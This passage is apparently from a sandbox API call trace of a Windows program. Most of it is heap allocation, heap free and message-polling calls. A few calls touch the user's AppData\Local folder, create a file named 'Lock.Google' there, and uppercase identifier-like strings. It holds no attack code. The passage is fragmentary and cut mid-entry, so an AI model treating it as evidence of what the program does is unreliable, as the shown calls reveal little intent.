Flags=0x0, Size=0x4) returned 0x24b17e8 [0209.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x2416270 [0209.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0209.788] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Local/" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local")) returned 0x2010 [0209.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0209.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0209.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0209.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10000) returned 0x34b2250 [0209.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0209.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0209.789] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Local/Lock.Google" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\lock.google"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c4 [0209.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0209.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0209.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0209.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0209.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0209.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0209.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0209.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0209.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0209.790] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0209.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0209.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0209.790] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0209.790] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0209.790] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0209.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0209.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0209.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0209.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0209.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0209.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0209.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0209.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0209.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0209.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0209.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0209.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0209.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0209.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0209.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0209.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0209.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0209.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0209.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0209.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0209.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0209.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0209.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0209.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0209.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0209.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0209.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0209.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0209.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0209.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0209.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0209.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0209.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0209.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0209.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0209.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0209.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0209.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0209.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0209.792] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0209.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0209.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0209.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0209.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0209.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0209.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1748 [0209.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0209.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0209.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0209.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0209.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0209.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0209.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0209.793] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0209.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0209.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0209.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0209.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0209.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0209.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0209.793] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0209.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0209.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0209.793] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0209.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0209.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0209.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0209.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1858 [0209.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0209.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0209.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0209.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0209.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0209.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1748 [0209.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0209.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0209.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0209.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b13c8 [0209.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0209.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0209.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0209.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c38 [0209.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0209.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0209.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0209.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa8e0 [0209.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0209.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0209.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0209.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0209.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0209.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0209.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0209.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0209.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0209.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0209.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0209.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0209.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0209.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0209.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0209.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0209.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0209.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0209.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0209.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0209.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0209.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0209.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0209.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0209.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0209.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0209.795] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0209.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0209.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0209.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0209.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0209.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0209.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0209.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0209.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0209.796] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0209.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0209.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0209.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0209.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0209.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0209.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0209.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0209.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0209.796] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0209.796] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0209.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0209.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0209.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0209.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0209.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0209.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0209.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0209.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0209.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0209.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0209.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0209.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0209.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0209.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0209.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0209.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0209.797] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0209.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0209.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0209.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0209.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0209.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0209.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0209.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0209.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0209.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0209.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0209.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0209.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0209.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0209.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0209.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0209.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0209.798] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0209.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0209.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0209.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0209.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0209.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0209.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0209.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0209.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0209.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0209.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0209.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0209.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0209.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0209.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0209.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0209.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0209.800] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0209.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0209.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0209.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0209.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0209.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0209.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0209.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0209.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0209.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0209.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0209.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0209.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0209.800] RtlAllocateHeap (HeapHandle=0x25c0000, 